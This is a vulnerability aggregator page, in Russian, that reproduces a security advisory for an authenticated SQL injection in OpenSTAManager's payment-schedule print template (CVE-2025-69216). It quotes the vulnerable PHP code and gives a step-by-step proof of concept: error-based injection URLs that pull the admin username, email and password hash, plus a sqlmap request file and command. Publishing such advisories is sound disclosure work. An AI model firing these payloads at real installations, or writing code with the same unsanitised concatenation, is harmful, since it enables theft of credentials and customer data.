Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-q6g3-fv43-m2w6

Опубликовано: 06 фев. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.7

Описание

OpenSTAManager has a SQL Injection in Scadenzario Print Template

Summary

An authenticated SQL Injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.

Details

The vulnerability exists in templates/scadenzario/init.php at line 46, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization:

Vulnerable Code:

if (get('id_anagrafica') && get('id_anagrafica') != 'null') { $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query); $id_anagrafica = get('id_anagrafica'); }

The get() function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's prepare() sanitization function, enabling SQL Injection attacks.

Root Cause:

  • Missing use of prepare() function for input sanitization
  • Direct string concatenation in SQL query construction
  • No input validation or type checking

Affected Endpoint:

/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

Affected Files:

  • templates/scadenzario/init.php (line 46) - Primary vulnerability
  • templates/scadenzario/init.php (lines 34, 40) - Similar pattern with date parameters
  • pdfgen.php - Entry point for template rendering

PoC (Proof of Concept)

Prerequisites

  • Valid authenticated session (any user role)

Exploitation Steps

1. Confirm Vulnerability - Basic Syntax Error Test:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

SQL syntax error displayed in application response

image

2. Extract Database Version - Error-Based SQLi:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Result: ~8.3.0~ (MySQL version)

image

3. Extract Database Name:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Result: ~openstamanager~

image

4. Extract Admin Username:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Result: ~admin~ image

5. Extract Admin Email:

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Result: Admin email address

image

6. Extract Password Hash (Partial - XPATH 31 char limit):

http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Result: bcrypt password hash

image

7. Automated Exploitation with SQLMap:

Create request file sqli_osm.req:

GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=[SESSION_COOKIE] User-Agent: Mozilla/5.0

Run SQLMap:

sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

SQLMap Confirmed Injection Types:

  • ✅ Boolean-based blind SQL injection
  • ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET)
  • ✅ Time-based blind SQL injection (SLEEP)
image

Impact

Who is Impacted:

  • All authenticated users - Any user with valid credentials can exploit this vulnerability
  • Low-privilege users - Even users with minimal permissions can access admin-level data
  • All OpenSTAManager installations - Vulnerability exists in the latest master branch

Attribution

Reported by Łukasz Rybak

Ссылки

Пакеты

Наименование

devcode-it/openstamanager

composer
Затронутые версииВерсия исправления

<= 2.9.8

Отсутствует

EPSS

Процентиль: 1%
0.0001
Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-69216

Дефекты

CWE-89

Связанные уязвимости

nvd логотип

CVE-2025-69216

nvd
2 дня назад

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an authenticated SQL injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability exists in templates/scadenzario/init.php, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization. The vulnerability enables complete database read access through error-based SQL injection techniques.

EPSS

Процентиль: 1%
0.0001
Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-69216

Дефекты

CWE-89